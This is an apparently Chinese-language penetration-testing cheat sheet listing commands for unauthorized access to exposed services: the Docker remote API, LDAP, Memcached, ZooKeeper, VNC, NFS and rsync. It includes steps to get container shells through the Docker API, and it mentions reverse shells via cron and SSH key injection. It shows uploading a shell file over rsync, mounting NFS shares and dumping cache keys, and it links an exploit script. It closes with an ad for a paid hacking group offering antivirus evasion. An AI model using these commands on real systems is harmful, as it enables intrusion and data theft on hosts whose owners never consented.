#获取docker信息
http://IP地址:2375/info
#获取版本信息
http://IP地址:2375/version
#获取images/json列表信息
http://IP地址:2375/images/ #返回OK即可证明可返回images/json列表信息
http://IP地址:2375/images/json
#列出所有容器信息
docker -H tcp://IP地址 ps -a
#列出镜像信息
docker -H tcp://IP地址 images
#通过attach命令获取shell权限
docker -H tcp://IP地址 attach container id
#通过写入SSH公钥获取shell权限
#通过写定时任务反弹shell获取shell权限
......等等
脚本利用:https://github.com/ianxtianxt/docker_api_vul
LDAP默认端口为389,LDAPS默认端口为636,目前市面上LDAPS已经被淘汰了。
直接使用ldapbrowser进行连接
下载地址:https://ldapbrowserwindows.com/
telnet IP地址 端口
nc -vv IP地址 端口
#查看服务状态
stats
#查看items项
stats items
#获取缓存key
stats cachedump slab_id limit_num
#还有更多命令可以参考Memcached 使用命令
#列出客户端连接的统计信息
echo stat |nc ip地址 端口(默认2181)
#列出服务环境的详细信息
echo envi |nc ip地址 端口(默认2181)
#测试服务器是否运行在非错误状态
echo ruok |nc ip地址 端口(默认2181)
#列出未完成会话和临时节点
echo dump |nc ip地址 端口(默认2181)
#列出未完成的请求
echo reqs |nc ip地址 端口(默认2181)
#直接以端口号5900,5901进行连接
vncviewer IP地址:端口
#以密码连接
vncviewer -passwd /vnc/vncpasswdfile IP地址:端口
#使用vnc viewer工具连接
下载链接:https://vnc-viewer.en.softonic.com/
默认端口2049
#查看共享资源
showmount -e IP地址
#存在目录时我们可以使用命令将共享目录挂载到我们自身本地进行浏览
mount -t nfs IP地址:/共享目录 /本地目录
#直接使用rsync命令进行连接
rsync rsync://IP地址:873/
rsync rsync://IP地址:873/文件名或文件夹名
#上传文件
rsync -av shell rsync://IP地址:873/文件名或文件夹名/shell
#下载恶意文件或执行脚本
rsync -av rsync://IP地址:873/文件名或文件夹名
.......等等敏感操作
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读